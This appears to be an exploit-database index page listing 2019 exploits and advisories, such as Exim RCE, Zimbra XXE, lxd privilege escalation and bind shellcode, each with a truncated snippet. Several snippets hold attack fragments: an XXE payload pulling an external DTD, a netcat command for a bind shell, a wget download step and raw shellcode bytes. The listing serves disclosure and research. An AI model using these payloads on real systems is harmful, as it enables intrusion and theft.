Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting Vulnerability
Exploit for jsp platform in category web applications Exploit Title: Liferay Portal ” / or ” /. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code calling the ” /...
Webmin 1.910 - (Package Updates) Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin %q This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the "Packa...
ProShow 9.0.3797 - Local Privilege Escalation Exploit
Exploit for windows platform in category local exploits !/usr/bin/python coding:utf-8 Exploit Title: ProShow v9.0.3797 Local Exploit Exploit Author: @YonatanCorrea website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html Vendor Homepage:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)
;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh 104 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 104 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"...
WordPress Insert or Embed Articulate Content Plugin - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Authenticated code execution in insert-or-embed-articulate-content-into-wordpress Wordpress plugin Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive Exploit Author:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) #Shellcode (131 bytes)
Exploit for linux/x86-64 platform in category shellcode ;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and...
Ubuntu 18.04 - (lxd) Privilege Escalation Exploit #LPE #RCE
Exploit for linux platform in category local exploits !/usr/bin/env bash ---------------------------------- Authors: Marcelo Vazquez S4vitar Victor Lasa vowkin ---------------------------------- Step 1: Download build-alpine = wget...
UliCMS 2019.1 Spitting Lama - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Unk9vvN Vendor Homepage: https://en.ulicms.de Software Link:...
Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit
Qualys Security Advisory The Return of the WIZard: RCE in Exim CVE-2019-10149 ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default...
Supra Smart Cloud TV - openLiveURL() Remote File Inclusion Vulnerability
Exploit for hardware platform in category web applications Supra Smart Cloud TV - 'openLiveURL' Remote File Inclusion Exploit Author: Dhiraj Mishra Vendor Homepage: https://supra.ru Software Link: https://supra.ru/catalog/televizory/televizorsuprastvlc40lt0020f/ CVE: CVE-2019-12477 References:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444" ================== ASSEMB...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3) Exploit
Exploit for windows platform in category local exploits Microsoft Windows - AppX Deployment Service Local Privilege Escalation 3 CVE-2019-0841 BYPASS 2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within...
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution Vulnerability
Exploit for linux platform in category local exploits by Arminius @rawsec Vim/Neovim Arbitrary Code Execution via Modelines ================================================= Product: Vim 8.1.1365, Neovim 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius...
Nvidia GeForce Experience Web Helper - Command Injection Exploit
Exploit for windows platform in category local exploits //Send request to local GFE server function submitRequestport,secret var xhr = new XMLHttpRequest; xhr.open"POST", "http://127.0.0.1:"+port+"/gfeupdate/autoGFEInstall/", true; xhr.setRequestHeader"Accept",...
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery Vulnerability
Exploit for jsp platform in category web applications Zimbra |";int c;while c = in.read != -1 out.printcharc;in.close;out.print"|' printbaseurl dtd file url dtdurl="https://k8gege.github.io/zimbra.dtd" """ " !ENTITY % all "!ENTITY fileContents '%start;...
Zoho ManageEngine ServiceDesk Plus 9.3 - (PurchaseRequest.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
LibreNMS - addhost Command Injection Exploit
This Metasploit module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed ...
Google Chrome 73.0.3683.103 - WasmMemoryObject::Grow Use-After-Free Exploit
Google Chrome 73.0.3683.103 - WasmMemoryObject::Grow Use-After-Free Exploit memoryobject, uint32t pages ... Handle newbuffer; if oldbuffer-isshared // Adjust protections for the buffer. if !AdjustBufferPermissionsisolate, oldbuffer, newsize return -1; void backingstore = oldbuffer-backingstore; i...
Inateck 2.4 GHz Wearable Wireless Presenter WP2002 Keystroke Injection Vulnerability
Product: 2.4 GHz Wearable Wireless Presenter WP2002 Manufacturer: Inateck Affected Versions: n/a Tested Versions: n/a Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification:...
DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH Exploit Author: Kevin Randall Vendor Homepage: http://www.dvd-x-player.com/download.htmldvdPlayer Software Link: http://www.dvd-x-player.com/download.htmldvdPlayer Version: 5.5...
IceWarp 10.4.4 - Local File Inclusion Vulnerability
Exploit for php platform in category web applications Exploit Title: IceWarp =10.4.4 local file include Exploit Author: JameelNabbo Website: uitsec.com Vendor Homepage: http://www.icewarp.com Software Link: https://www.icewarp.com/downloads/trial/ Version: 10.4.4 Tested on: Windows 10 CVE:...
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Exploit
This Metasploit module exploits untrusted serialized data processed by the WAS DMGR Server and Cells in the IBM Websphere Application Server. NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset. This module requires Metasploit:...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SiteLookup.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SolutionSearch.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SearchN.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Logitech R700 Laser Presentation Remote Keystroke Injection Vulnerability
Product: R700 Laser Presentation Remote Manufacturer: Logitech Affected Versions: Model R-R0010 PID WD904XM and PID WD802XM Tested Versions: Model R-R0010 PID WD904XM and PID WD802XM Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk...
Inateck 2.4 GHz Wireless Presenter WP1001 Keystroke Injection Vulnerability
Product: 2.4 GHz Wireless Presenter WP1001 Manufacturer: Inateck Affected Versions: Rev. v1.3C Tested Versions: Rev. v1.3C Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification:...
NUUO NVRMini 2 3.9.1 - (sscanf) Stack Overflow Exploit
!/usr/bin/python Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow Google Dork: n/a Date: Advisory Published: Nov 18 Exploit Author: @0x00string Vendor Homepage: nuuo.com Software Link: https://www.nuuo.com/ProductNode.php?node=2 Version: 3.9.1 and prior Tested on: 3.9.1 CVE :...
Cisco RV130W 1.0.3.44 - Remote Stack Overflow Exploit
!/usr/bin/python Exploit Title: Cisco RV130W Remote Stack Overflow Google Dork: n/a Date: Advisory Published: Feb 2019 Exploit Author: @0x00string Vendor Homepage: cisco.com Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html Version...
AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control
Exploit for hardware platform in category web applications Exploit Title: AUO Solar Data Recorder - Incorrect Access Control Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO Solar Data Recorder all versions prior to v1.3.0 Tested on: It is a proprietary devices:...
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Dell Kace Appliance Multiple Vulnerabilities Exploit Author: SlidingWindow, Twitter: @kapilkhot Vendor Homepage: https://www.quest.com/products/kace-systems-management-appliance/ Affected Versions: KACE SMA versions prior to...
ZyXEL P-660HN-T1 V2 Missing Authentication / Password Disclosure Vulnerabilities
Exploit for hardware platform in category web applications Description: The rpWLANRedirect.asp ASP page is accessible without authentication on ZyXEL P-660HN-T1 V2 2.00AAKK.3 devices. After accessing the page, the admin user's password can be obtained by viewing the HTML source code, and the...
WordPress Form Maker 1.13.3 Plugin - SQL Injection Exploit
Exploit for php platform in category web applications -- coding: utf-8 -- Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://10web.io/plugins/ Software Link: https://wordpress.org/plugins/form-maker/ Version:...
Safari Webkit Proxy Object Type Confusion Exploit
This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the...
Microsoft Windows Remote Desktop - BlueKeep Denial of Service Exploit
import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...
Serv-U FTP Server 15.1.6.25 Local Privilege Escalation Vulnerability
Exploit for multiple platform in category local exploits CVE: CVE-2018-19999 Security researcher: Chris Moberly @ The Missing Link Security Product name: Serv-U FTP Server Product version: Tested on 15.1.6.25 current as of Dec 2018 Fixed in: 15.1.7 Overview The Serv-U FTP Server is vulnerable to...
Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit
Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...
Siemens LOGO! 8 Hard-Coded Cryptographic Key Vulnerability
Due to the use of a hard-coded cryptographic key, an attacker can put the integrity and confidentiality of encrypted data of all Siemens LOGO! 8 PLCs using this key at risk, for instance decrypting network communication during a man-in-the-middle attack. Siemens LOGO! 8 Hard-Coded Cryptographic K...
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL Exploit
The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: When kgslmementrydestroy in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSLMEMENTRYUSER, it attempts to mark the entry's pages as dirty...
Siemens LOGO! 8 Missing Authentication Vulnerability
Due to storing passwords in a recoverable format on Siemens LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext. Siemens LOGO! 8 Missing Authentication Vulnerability Product: LOGO! Manufacturer: Siemens Affected Versions: LOGO! 8 all versions Tested Versions: LOGO! 8,...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2) Exploit
Exploit for windows platform in category local exploits Microsoft Windows - AppX Deployment Service Local Privilege Escalation 2 Exploit There is still a vuln in the code triggered by CVE-2019-0841 The bug that this guy found:...
Siemens LOGO! 8 Recoverable Password Format Vulnerability
Due to storing passwords in a recoverable format on Siemens LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext. Siemens LOGO! 8 Recoverable Password Format Vulnerability Product: LOGO! Manufacturer: Siemens Affected Versions: LOGO! 8 all versions Tested Versions: LOGO!...
Oracle Application Testing Suite WebLogic Server Administration Console War Deployment Exploit
This Metasploit module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you...
Cyberoam Transparent Authentication Suite 2.1.2.5 NetBIOS Name / FQDN Denial Of Service Exploit
Cyberoam Transparent Authentication Suite version 2.1.2.5 Fully Qualified Domain Name and NetBIOS Name proof of concept denial of service exploits. Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service PoC Discovery by: Victor Mondragón...
CMS Made Simple 2.2.10 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications ============================================= MGC ALERT 2019-002 - Original release date: April 10, 2019 - Last revised: May 22, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 CVSS Base Score - CVE-ID: CVE-2019-11226...
Deltek Maconomy 2.2.5 Local File Inclusion Vulnerability
Exploit for cgi platform in category web applications Exploit Title: Maconomy Erp local file include Exploit Author: JameelNabbo Website: jameelnabbo.com Vendor Homepage: https://www.deltek.com Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy CVE: CVE-2019-12314 POC: POC:...
JavaScript V8 Turbofan Out-Of-Bounds Read Exploit
V8: Turbofan may read a Map pointer out-of-bounds when optimizing Reflect.construct The following JavaScript program found through fuzzing triggers an assertion failure in debug builds of the latest v8 and the current release branch, 7.2.502.28: function farg const o =...
EquityPandit 1.0 - Password Disclosure Vulnerability
Exploit for Android platform in category local exploits...
Cyberoam General Authentication Client 2.1.2.7 Server Address Denial Of Service Exploit
Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service PoC Discovery by: Victor Mondragón Vendor Homepage: https://www.cyberoam.com Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip Tested...
Phraseanet < 4.0.7 - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software Exploit Author: Krzysztof Szulski Vendor Homepage: https://www.phraseanet.com Software Link also VM: https://www.phraseanet.com/en/download/ Version affected:...